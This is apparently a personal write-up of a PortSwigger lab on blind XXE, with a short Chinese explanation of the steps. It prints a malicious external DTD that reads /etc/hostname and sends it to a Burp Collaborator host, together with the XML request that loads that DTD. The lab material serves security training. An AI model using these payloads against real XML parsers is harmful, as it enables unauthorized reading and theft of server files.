Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

Posted on | Post modified | In |

Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

tags: Portswigger Web Security Academy Web
  • Description: This lab has a “Check stock” feature that parses XML input but does not display the result.
  • Goal: To solve the lab, exfiltrate the contents of the /etc/hostname file.
  • Hint: To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator’s default public server.

Recon

  1. Use the previous method :::spoiler Payload 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    		 
     <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://d3hr4hyf51vbe69iuzp4czdzuq0ho6.burpcollaborator.net"> %xxe; ]>
 <stockCheck>
     <productId>
         1
     </productId>
     <storeId>
         1
     </storeId>
 </stockCheck>

    ::: By using the previous method, we can not achieve our goal which is exfiltrating the host name of the server.

  2. A new method Refer to the hint, we can use the exploit server they provided.
    1. Copy the Collaborator Payload
    2. Complete Malicious Server Payload and Store 
      1
      2
      3
      4
      		 
       <!ENTITY % file SYSTEM "file:///etc/hostname">
 <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
 %eval;
 %exfil;
    3. Complete Intercept Packet Payload Intercept the packet that you click Check stock button in arbitrary product page. Copy and paste your malicious server URL to YOUR-DTD-URL, e.g. https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit 
      1
      		 
       <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
    4. Send packet and observe in Collaborator

Exp - 通靈

完整的流程有點複雜,我自己的想法是暫停的封包會因為parameter entity的reference,而觸發%xxe而和malicious server產生互動,此時malicious server就可以利用%eval%exfilSYSTEM "file:///etc/hostname"這個指令被執行,並且把結果當作Collaborator的GET參數回傳給Burp Suite,此時我們就可以在Burp Suite的Collaborator中看到hostname是甚麼了。

:::spoiler Malicious Server Payload

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ehzsiicgj29cs7nj8035q0r08reh26.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

::: :::spoiler Packet Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aae00dc044ebfc38406a3db012f0055.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        1
    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>

::: :::spoiler Success Screenshot :::

Reference

XXE Lab Breakdown: Exploiting blind XXE to exfiltrate data using a malicious external DTD